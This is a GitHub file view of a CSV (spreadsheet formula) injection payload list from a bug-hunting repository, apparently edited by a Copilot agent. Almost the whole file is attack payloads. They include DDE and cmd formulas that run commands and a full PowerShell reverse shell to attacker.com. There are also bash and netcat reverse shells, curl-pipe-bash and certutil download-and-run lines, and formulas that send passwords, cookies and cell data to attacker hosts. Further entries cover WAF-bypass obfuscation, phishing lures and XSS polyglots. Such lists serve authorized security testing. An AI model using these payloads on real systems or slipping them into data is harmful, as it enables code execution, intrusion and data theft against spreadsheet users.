0x5t4l1n/hunting
1
0
Fork 0
mirror of https://github.com/0x5t4l1n/hunting.git synced 2026-05-26 11:35:51 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
c7627288f34848815031a104f798db08a81ca7bd
hunting/CSV-Injection/csv-injection-payloads.txt
T
copilot-swe-agent[bot] c7627288f3 Minor improvements to payload documentation and clarity 
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
2026-01-04 19:48:54 +00:00

329 lines
8.6 KiB
Plaintext
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
# CSV Injection Payloads (Formula Injection) - 2020-2025
# ============================
# Basic Formula Injection
# ============================
# Equals Formula
=1+1
=1+2+3
=SUM(1+1)
=2+5+cmd|' /C calc'!A0
="string"
=CMD|' /C powershell IEX(wget attacker.com/shell.ps1)'!A0
# Plus Formula
+1+1
+cmd|'/c calc'!A1
+DDE("cmd";"/c calc";"!")
# Minus Formula
-1+1
-cmd|'/c calc'!A1
-DDE("cmd";"/c calc";"!")
# At Symbol Formula
@sum(1+1)
@SUM(A1:A10)
# Tab Character
=1+1
+1+1
-1+1
@sum(1+1)
# Carriage Return
=1+1
+=1+1
# ============================
# DDE (Dynamic Data Exchange) Attacks
# ============================
# Basic DDE - Command Execution
=DDE("cmd";"/c calc";"!")
=DDE("cmd";"/c calc.exe";"!")
=DDE("cmd";"/c powershell";"!")
=DDE("cmd";"/c cmd";"!")
# DDE - File Reading
=DDE("cmd";"/c type C:\Windows\System32\drivers\etc\hosts";"!")
=DDE("cmd";"/c type C:\Users\*\Desktop\passwords.txt";"!")
=DDE("cmd";"/c dir C:\";"!")
# DDE - Information Disclosure
=DDE("cmd";"/c whoami";"!")
=DDE("cmd";"/c hostname";"!")
=DDE("cmd";"/c ipconfig";"!")
=DDE("cmd";"/c net user";"!")
=DDE("cmd";"/c systeminfo";"!")
# DDE - Data Exfiltration
=DDE("cmd";"/c curl http://attacker.com?data=$(whoami)";"!")
=DDE("cmd";"/c powershell -c Invoke-WebRequest -Uri http://attacker.com -Method POST -Body (Get-Content C:\passwords.txt)";"!")
=DDE("cmd";"/c certutil -urlcache -split -f http://attacker.com/shell.exe C:\temp\shell.exe";"!")
# DDE - Reverse Shell
=DDE("cmd";"/c powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('attacker.com',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"";"!")
# ============================
# Excel HYPERLINK Function
# ============================
=HYPERLINK("http://attacker.com","Click here")
=HYPERLINK("http://attacker.com?cookie="&A1,"Click")
=HYPERLINK("file:///C:/Windows/System32/calc.exe","Click to update")
=HYPERLINK(CONCATENATE("http://attacker.com/",A1),"Link")
# ============================
# IMPORTXML / WEBSERVICE Functions
# ============================
=IMPORTXML("http://attacker.com/xxe.xml","//data")
=IMPORTXML(CONCAT("http://attacker.com?data=",A1),"//data")
=WEBSERVICE("http://attacker.com")
=WEBSERVICE(CONCAT("http://attacker.com?leak=",A1))
# ============================
# Obfuscation Techniques
# ============================
# Using CHAR function to hide commands
=CHAR(61)&"DDE(""cmd"";""/c calc"";""!"")"
=CONCATENATE(CHAR(61),"1+1")
=CHAR(61)&CHAR(68)&CHAR(68)&CHAR(69)&"(""cmd"";""/c calc"";""!"")"
# Using string concatenation
="="&"1+1"
=CONCATENATE("=","1+1")
="="&"DDE(""cmd"";""/c calc"";""!"")"
# Double encoding
==1+1
=+1+1
= =1+1
# Null byte injection
=1+1%00
=DDE("cmd";"/c calc";"!")%00
# Unicode characters
1+1
﹢1+1
⁼1+1
# Whitespace obfuscation
= 1+1
= 1+1
= 1+1
# ============================
# Cross-Application Payloads
# ============================
# LibreOffice Calc
=SHELL("calc")
=SHELL("gnome-calculator")
=SHELL("xterm -e bash")
=SHELL("wget http://attacker.com/shell.sh -O /tmp/shell.sh && bash /tmp/shell.sh")
# Google Sheets
=IMAGE("http://attacker.com/track.png")
=IMAGE("https://attacker.com/"&A1)
=IMPORTDATA("http://attacker.com/data.csv")
=IMPORTFEED("http://attacker.com/feed")
=IMPORTHTML("http://attacker.com","table",1)
=IMPORTRANGE("spreadsheet-id","Sheet1!A1:B10")
# ============================
# Advanced Techniques (2023-2025)
# ============================
# Chained formulas
=IF(A1="admin",DDE("cmd";"/c calc";"!"),"safe")
=IF(ISNUMBER(SEARCH("admin",A1)),WEBSERVICE("http://attacker.com"),"")
# Nested functions
=SUM(DDE("cmd";"/c calc";"!"))
=CONCATENATE(DDE("cmd";"/c whoami";"!"))
# Conditional execution
=IF(1=1,DDE("cmd";"/c calc";"!"),1)
=IFERROR(DDE("cmd";"/c calc";"!"),1)
# ============================
# Context-Aware Payloads
# ============================
# Name field
=DDE("cmd";"/c calc";"!")
+DDE("cmd";"/c calc";"!")
-DDE("cmd";"/c calc";"!")
@DDE("cmd";"/c calc";"!")
# Email field
test@test.com=DDE("cmd";"/c calc";"!")
=WEBSERVICE("http://attacker.com")@test.com
# Comment field
Great product! =DDE("cmd";"/c calc";"!")
Review: +cmd|'/c calc'!A1
# ============================
# Payload Variations for WAF Bypass
# ============================
# Mixed case
=dDe("cmd";"/c calc";"!")
=DdE("cmd";"/c calc";"!")
# Alternative quotes
=DDE('cmd';'/c calc';'!')
=DDE(`cmd`;`/c calc`;`!`)
# Line breaks
=DDE("cmd";
"/c calc";
"!")
# Tabs and spaces
=DDE( "cmd" ; "/c calc" ; "!" )
# ============================
# Platform-Specific Payloads
# ============================
# Windows
=cmd|'/c calc'!A1
=cmd|'/c powershell -c "Start-Process calc"'!A1
=cmd|'/c mshta http://attacker.com/payload.hta'!A1
=cmd|'/c certutil -urlcache -split -f http://attacker.com/bad.exe bad.exe && bad.exe'!A1
=cmd|'/c wmic process call create "calc.exe"'!A1
=cmd|'/c reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall'!A1
# Linux/Unix
=SHELL("calc")
=SHELL("xcalc")
=SHELL("xterm")
=SHELL("/bin/bash -i >& /dev/tcp/attacker.com/4444 0>&1")
=SHELL("curl http://attacker.com/shell.sh | bash")
=SHELL("nc attacker.com 4444 -e /bin/sh")
# macOS
=SHELL("open /Applications/Calculator.app")
=SHELL("osascript -e 'tell application \"Calculator\" to activate'")
=SHELL("curl http://attacker.com/payload.sh | sh")
# ============================
# Data Exfiltration Payloads
# ============================
# Exfiltrate cell data
=WEBSERVICE("http://attacker.com?data="&A1)
=HYPERLINK("http://attacker.com?token="&B2,"Update")
=IMAGE("http://attacker.com/track.gif?user="&C3)
# Exfiltrate multiple cells
=WEBSERVICE("http://attacker.com?u="&A1&"&p="&B1)
=CONCATENATE("http://attacker.com/",A1,"/",B1,"/",C1)
# ============================
# Denial of Service
# ============================
# Resource exhaustion
=SUM(1:1048576)
=IF(A1<>"",$A$1:$XFD$1048576,"")
=VLOOKUP(A1,$A$1:$XFD$1048576,1,FALSE)
# Circular references
=A1
# Note: When placed in cell A1 itself, this causes a circular reference error
# ============================
# Remote File Inclusion
# ============================
=IMPORTXML("http://attacker.com/xxe.xml","//data")
=IMPORTHTML("http://attacker.com/malicious.html","table",1)
=IMPORTFEED("http://attacker.com/rss")
=IMPORTDATA("http://attacker.com/data.txt")
# ============================
# XXE via CSV (when parsed as XML internally)
# ============================
=IMPORTXML("data:text/xml,<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><foo>&xxe;</foo>","//foo")
# ============================
# Social Engineering Payloads
# ============================
Please verify your account: =HYPERLINK("http://phishing.com","Click Here")
Congratulations! You won: =DDE("cmd";"/c calc";"!")
URGENT - Security Update Required =cmd|'/c powershell iex(wget attacker.com/malware.ps1)'!A1
Invoice #12345 =WEBSERVICE("http://attacker.com/log")
# ============================
# Polyglot Payloads
# ============================
=1+1';alert(document.domain)//
=DDE("cmd";"/c calc";"!")||'<script>alert(1)</script>
+cmd|'/c calc'!A1'"><img src=x onerror=alert(1)>
# ============================
# Null Cell Reference
# ============================
=A0
=DDE("cmd";"/c calc";"!")!A0
=cmd|'/c powershell'!A0
# ============================
# Format Confusion
# ============================
"=1+1"
'=1+1
`=1+1
´=1+1
# ============================
# Batch CSV Injection (Multiple Rows)
# ============================
# First row normal, second row malicious
Normal User,user@email.com,Regular Comment
Hacker,=DDE("cmd";"/c calc";"!"),Malicious
# ============================
# CSV Injection in Different Contexts
# ============================
# In URL parameters
?name==DDE("cmd";"/c calc";"!")
?search=+cmd|'/c calc'!A1
# In JSON (if converted to CSV)
{"name": "=DDE(\"cmd\";\"/c calc\";\"!\")"}
# In XML (if converted to CSV)
<name>=cmd|'/c calc'!A1</name>
# ============================
# Time-Delayed Payloads
# ============================
=IF(NOW()>DATE(2024,1,1),DDE("cmd";"/c calc";"!"),1)
=IF(TODAY()=WEEKDAY(1),WEBSERVICE("http://attacker.com"),1)
# ============================
# Modern Framework Specific (2024-2025)
# ============================
# When exported from web applications
=WEBSERVICE(CONCAT("http://attacker.com/?cookie=",CELL("filename")))
=HYPERLINK("javascript:alert(document.cookie)","click")
=@SUM(A1:A1000)*WEBSERVICE("http://attacker.com")
Reference in New Issue View Git Blame Copy Permalink